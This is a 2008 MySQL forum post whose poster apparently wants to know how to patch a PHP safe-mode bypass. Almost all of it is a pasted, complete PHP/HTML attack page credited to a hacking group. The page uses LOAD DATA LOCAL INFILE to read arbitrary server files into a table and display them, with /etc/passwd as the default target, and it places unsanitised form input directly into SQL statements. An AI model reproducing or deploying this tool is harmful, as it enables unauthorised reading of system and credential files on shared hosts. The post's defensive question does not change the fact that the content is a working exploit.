MySQL Forums
Forum List  »  Quality Assurance

Mysql Bypass (MySQL Safe Mode Bypass Vulnerability)
Posted by: Masood Yarmohammadi
Date: January 04, 2008 09:55AM

Hacker can bypass our mysql and view any hosted files in server with
following script:

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="keywords" content="Mysql Bypass,Ashiyane Digital Security
Team ,Sha2ow">
<meta name="description" content="Mysql Bypass - Ashiyane Digital
Security Team . Sha2ow">
<title>Mysql Bypass - Ashiyane Digital Security Team .</title>
</head>

<body text="#FFFFFF" bgcolor="#000000">


<p align="center">
<br>
<font face="Tahoma" style="font-size: 15pt; font-weight: 700">Ashiyane
Digital Security Team<br>
Mysql Bypass <br>
</font><font face="Tahoma" size="2">4.4.7 / 5.2.3 PHP ver -&nbsp; MySQL
Safe
Mode Bypass Vulnerability<br>
only ,
Create mysql database and add user for mysql database</font><font
face="Tahoma" style="font-size: 10pt; font-weight: 700"><br>
&nbsp;</font></p>
<div align="center">

<form method="post">

<table border="0" cellspacing="1" width="859" height="6%">
<tr>
<td width="311"><font face="Tahoma"><span style="font-size:
9pt">&nbsp;DataBase
Name : <input type="text" name="dbname" size="20">&nbsp;&nbsp;&nbsp;

</span></font></td>
<td width="240"><font face="Tahoma"><span style="font-size: 9pt">
Username :&nbsp; <input type="text" name="dbuser"
size="20">&nbsp;&nbsp;</span></font></td>
<td width="298"><font face="Tahoma"><span style="font-size:
9pt">&nbsp;Password
:&nbsp; <input type="text" name="dbpass"
size="20"></span></font></td>
</tr>
<tr>
<td width="311" valign="middle">
&nbsp;</td>
<td width="240" valign="middle">
&nbsp;</td>
<td width="298" valign="middle">
&nbsp;</td>
</tr>
<tr>
<td width="554" valign="middle" colspan="2">
<p align="left"><font face="Tahoma"><span style="font-size: 9pt">
File Path :&nbsp;&nbsp;
<input type="text" name="path1" size="45" style=" weight:200;
height:21; width:229" dir="ltr" value="/etc/passwd">&nbsp;<input
type="submit" value="Bypass" name="exec"></span></font></td>
<td width="298" valign="middle">
&nbsp;</td>
</tr>
<tr>
<td width="855" valign="middle" colspan="3">
<br>
<?
if(!empty($_POST['dbname']) && !empty($_POST['dbuser']) &&
!empty($_POST['dbpass']) && !empty($_POST['path1']))
{
$dbname = $_POST['dbname'];
$dbuser = $_POST['dbuser'];
$dbpass = $_POST['dbpass'];
$path1 = $_POST['path1'];
if(mysql_connect( "localhost", $dbuser, $dbpass ))
{
$drop= "DROP TABLE $dbname.`bypass`" ;
$query = "CREATE TABLE $dbname.`bypass` (`fileview` VARCHAR( 2048 ) NOT
NULL);";
mysql_query($drop);
mysql_query($query);
mysql_query("LOAD DATA LOCAL INFILE " . "'$path1'" . " INTO TABLE " .
$dbname . ".bypass");
$result =mysql_db_query($dbname,"SELECT * FROM bypass ");
$numrows = mysql_num_rows($result);
?>

<textarea rows="15" name="result" cols="103">
<?
while($row = mysql_fetch_array($result)) {
echo $row[fileview] ;

}
}

}

?>
</textarea></td>

</tr>
</table>
</form>
</div>
<p align="center"><font face="Tahoma" size="2"
color="#FF0000">&nbsp;Ashiyane
Digital Security Team - Copyright Sha2ow.</font></p>


How can path this?

Options: ReplyQuote


Subject
Views
Written By
Posted
Mysql Bypass (MySQL Safe Mode Bypass Vulnerability)
6576
January 04, 2008 09:55AM


Sorry, you can't reply to this topic. It has been closed.

Content reproduced on this site is the property of the respective copyright holders. It is not reviewed in advance by Oracle and does not necessarily represent the opinion of Oracle or any other party.